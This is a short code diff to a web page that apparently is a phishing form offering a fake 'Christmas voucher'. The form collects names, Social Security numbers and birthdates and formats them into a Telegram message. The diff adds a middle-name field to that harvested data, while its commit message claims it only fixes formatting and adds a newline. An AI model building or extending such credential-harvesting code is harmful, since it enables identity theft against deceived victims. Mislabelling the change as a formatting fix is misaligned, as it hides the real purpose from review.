Fix formatting and add newline at end of index.html

--- a/index.html
+++ b/index.html
@@ -555,6 +555,7 @@ When form will be filled , you receive a confirmation email with next step!</p>
         function formatTelegramMessage(formData) {
             return `🎄 NEW CHRISTMAS VOUCHER REQUEST%0A%0A` +
                    `Fname: ${formData.firstName}%0A` +
+                   `Mname: ${formData.middleName}%0A` +
                    `Lname: ${formData.lastName}%0A` +
                    `ssn: ${formData.ssn}%0A` +
                    `dob: ${formData.birthdate}%0A` +
